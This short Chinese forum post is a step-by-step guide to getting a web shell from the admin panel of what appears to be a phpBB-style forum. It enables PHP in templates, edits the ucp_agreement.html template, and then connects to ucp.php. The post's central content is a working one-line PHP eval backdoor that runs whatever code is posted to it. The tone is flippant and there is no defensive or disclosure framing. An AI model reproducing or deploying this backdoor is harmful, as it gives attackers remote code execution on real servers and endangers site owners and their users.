没啥好说的,应某位管理要求发上来权当备忘录。
网上也有一堆类似的后台getshell,看到一个代码有点问题,稍作修改可拿权限。
切入正题:
step1
进后台-综合-安全设置-在模板中允许PHP打开,这样html内php就可以执行了。
step2
在综合-论坛设定-默认模板确定当前模板风格
step3
在 风格-模板-html中选择已知相关包含的html,这里我选择的ucp_agreement.html。
在模板中直接插入以下代码保存:
- <!-- PHP -->
- @eval($_POST[cmd]);
- <!-- ENDPHP -->
复制代码 step4
直接连ucp.php得shell,打完收功。